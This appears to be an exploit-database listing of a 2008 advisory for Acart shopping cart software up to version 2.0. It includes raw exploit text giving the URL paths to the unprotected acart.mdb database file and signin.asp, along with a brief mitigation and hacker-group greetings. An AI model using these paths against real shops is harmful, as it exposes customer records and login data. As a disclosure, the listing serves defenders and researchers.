header-logo
Suggest Exploit
vendor:
Shopping Cart Software
by:
indoushka
7,5
CVSS
HIGH
Backup Dump
200
CWE
Product Name: Shopping Cart Software
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Acart <= 2.0 Shopping Cart Software Backup Dump Vulnerability

Acart is a shopping cart software that is vulnerable to a backup dump vulnerability. An attacker can access the acart.mdb and signin.asp files to gain access to the information stored in the database. The vulnerability affects version 2.0 of the software.

Mitigation:

Ensure that the acart.mdb and signin.asp files are not accessible to unauthorized users.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Acart <= 2.0 Shopping Cart Software Backup Dump Vulnerability           
| # Author   : indoushka                                                                                                              
| # Home     : www.iqs3cur1ty.com                                                                                                                                                                                                                        
| # Bug      : Backup                                                             
======================      Exploit By indoushka       =================================
 # Exploit  : 
 

     1 - http://127.0.0.1/acart1_0/acart.mdb 
     
     2- http://127.0.0.1/acart1_0/signin.asp
     
  you find the information in the db. version 2.0 uses "acart2_0.mdb"
                    
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com *  www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------